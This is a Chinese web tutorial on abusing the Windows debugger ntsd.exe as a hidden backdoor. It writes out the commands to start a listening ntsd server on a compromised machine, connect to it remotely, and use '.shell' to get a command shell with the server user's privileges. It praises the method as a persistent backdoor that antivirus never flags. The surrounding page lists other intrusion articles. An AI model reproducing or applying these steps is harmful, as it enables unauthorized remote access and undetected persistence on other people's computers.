• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >入侵防御 > 微软的“后门”Ntsd的远程调试功能利用图解

微软的“后门”Ntsd的远程调试功能利用图解

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了微软的“后门”Ntsd的远程调试功能利用图解,其中包含微软的“后门”Ntsd的远程调试功能利用图解等知识点,遇到此问题的同学们可以参考下

1.肉鸡上运行:ntsd -server tcp:port=端口 要调试的程序(可以任意,只要存在即可),例如:ntsd -server tcp:port=99 calc.exe,会新弹出个窗口,并监听刚才设置端口。微软的“后门”Ntsd的远程调试功能利用 - 叶湘笑 - 纯白色 

2.本机运行:ntsd -remote tcp:server=IP,port=端口,例如:ntsd -remote tcp:server=192.168.1.1,port=99。会弹出一个窗口。如果参数填写正确的话,会连接上目标机器,会显示命令类似提示符的界面,同时 server 端(就是第一步监听的那个)会显示:0:000> COMPUTER\netbar (tcp 192.168.1.3, port 99) connected at Fri May 06 13:49:59 2011,表示有人连接了,同时还显示连接的机器名,用户名,连接类型,IP地址,端口,时间等信息。

微软的“后门”Ntsd的远程调试功能利用 - 叶湘笑 - 纯白色

3.输入:.shell,取得 shell,操作和 Cmd 完全一样,权限是服务端运行ntsd.exe的用户权限。

微软的“后门”Ntsd的远程调试功能利用 - 叶湘笑 - 纯白色

又是个留后门的好方法,全免杀,而且永不被杀……

这个其实是 NTSD.exe 的正常功能,远程调试功能,更多说明自己谷歌搜索,这是一个 windows 命令行下的调试工具,功能十分强大。

</div>

您可能想查找下面的文章:

相关文章

  • Mysql 另类盲注中的一些技巧小结
  • Serv-U FTP Jail Break(越权遍历目录、下载任意文件)
  • https加密也被破解 HEIST攻击从加密数据获取明文
  • windows下建立永久帐号方法
  • 手动mysql 高级注入实例分析
  • 速破解无线路由器密码的全过程
  • 利用最基本的SQL注入渗透BBSXP官方网站的台后管理
  • 黑客对一台虚拟主机服务器的渗透
  • 浅析*NIX机器的入侵
  • 黑客经验谈系列之入侵3389起源完整编

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • webshell下提权两个小技巧分享
    • 如何逆向破解HawkEye keylogger键盘记录器进入攻击者邮箱
    • 记一次入侵BT服务器
    • 完整的XSS wrom入侵实现流程
    • 记一次渗透空间服务器的艰难之旅
    • 安全中国提取权限过程 图文
    • 黑客都很厉害吗 厉害的只是一小部分
    • 入侵Oracle数据库时常用的操作命令整理
    • SQL配合3389的一次入侵(图)
    • 看看黑客都在偷窥什么!入侵个人电脑揭密(图)

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有